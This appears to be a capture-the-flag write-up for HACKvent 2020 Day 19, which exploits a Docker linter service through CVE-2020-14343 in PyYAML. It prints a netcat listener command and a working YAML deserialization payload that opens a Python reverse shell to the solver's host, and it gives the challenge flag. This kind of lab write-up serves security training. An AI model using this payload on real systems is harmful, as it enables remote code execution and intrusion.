HACKVent 2020 – Day 19

Challenge – Docker Linter Service

Docker Linter is a useful web application ensuring that your Docker-related files follow best practices. Unfortunately, there’s a security issue in there…

Requirements

This challenge requires a reverse shell. You can use the provided Web Shell or the VPN to solve this challenge (see RESOURCES on top).

Note: The VPN connection information has been updated.

Solution

Today’s challenge provides us with an instance of a Docker linter. It is possible to link “dockerfile”, “docker-compose.yml” and “.env files”.

Each of the linters tells you in the output which tools are used with which result. So we find out that the following tools are applied:

  • hadolint
  • dockerfile_lint
  • dockerlint.js
  • yamllint
  • docker-compose
  • dotenv-linter

After a brief investigation, it turns out that the Python yaml library “pyyaml”, most likely used by yamllint, has an RCE vulnerability that is known but not yet closed (as of 2020-12-19) (CVE-2020-14343).

So we start netcat, our local listener:

nc -l -v -p 4578

and try to exploit the vulnerability described in the github issue with a default python reverse shell:

!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.13.0.14',4578));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn('sh')"

And there we have a connection! The flag is also found quickly:

HV20{pyy4ml-full-l04d-15-1n53cur3-4nd-b0rk3d}

Tags:

Leave a Reply

Your email address will not be published. Required fields are marked *